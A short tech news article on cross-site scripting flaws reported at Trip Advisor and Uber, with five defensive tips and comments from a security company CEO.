Following reports that cross-site scripting (XSS) vulnerabilities were found this week on travel website Trip Advisor and rideshare site Uber, security experts labelled XSS flaws as the “easiest way for websites to be attacked”.

XSS is a type of computer security vulnerability typically found in website applications. It enables attackers to inject client-side script into Web pages viewed by other users. An XSS vulnerability may be used by attackers to bypass access controls such as the same origin policy.

Malicious hackers

Such vulnerabilities put website users, visitors and administrators at risk of being compromised by malicious hackers, with the potential theft of cookies, personal data, authentication credentials and browser history just the tip of iceberg.

So what can you do to limit the chance of being attacked via an XSS vulnerability? Here, CEO of High-Tech Bridge’s ethical hacking services, shares five security tips for XSS damage limitation.

1. Explain to your web developers that one XSS vulnerability may lead to total compromise of the entire company.

2. Make sure your web developers and server admins respect security best practices. This will already resolve the majority of potential problems.

3. Make sure that your IT team has a clear inventory of your web resources, that there is no abandoned or test web projects that are accessible from the outside.

4. Never rely on your web application firewall (WAF) as the sole security solution aimed to prevent all types of attacks.

5. Regularly conduct web penetration testing by independent companies.

Kolochenko said: “SQL injection vulnerabilities are becoming more and more rare, as well as other high and critical risk vulnerabilities. They are complex to detect and quite often requires a lot of time to exploit. At the same time almost nobody cares about “medium-risk” XSS vulnerabilities leaving their websites vulnerable. Obviously, hackers benefit from such negligence and use XSS vulnerabilities to achieve their goals. If you close your door, don’t forget to close your windows – otherwise the entire security is at risk.”

Duncan Macrae

Duncan MacRae is former editor and now a contributor to TechWeekEurope. He previously edited Computer Business Review's print/digital magazines and CBR Online, as well as Arabian Computer News in the UAE.

Recent Posts

BNP Paribas Joins JP Morgan Blockchain Trading Network

French bank BNP Paribas becomes first European bank to join JP Morgan's blockchain-based Onyx Digital…

15 hours ago

SEC Held Off Elon Musk Enforcement ‘Due To Court Fears’

US securities regulators may have refrained from enforcement actions against Elon Musk due to discouraging…

16 hours ago

Snap Earnings Warning Triggers Tech Sell-Off

Investors spooked after Snap warns of deteriorating economic conditions, says earnings now 'below the low…

18 hours ago

Russian Operator Discounts Smartphones As Sanctions Bite

Biggest Russian mobile operator MTS begins selling discounted and second-hand smartphones as Russians hit by…

18 hours ago

Clearview AI Fined £7.5m Over Facial Recognition Data

UK Information Commissioner's Office orders controversial facial recognition firm Clearview AI to delete data it…

19 hours ago

Airbnb To Pull Out Of China Amidst ‘Pandemic Challenges’

Airbnb to pull out of China as ongoing zero-Covid policy places severe restrictions on domestic…

20 hours ago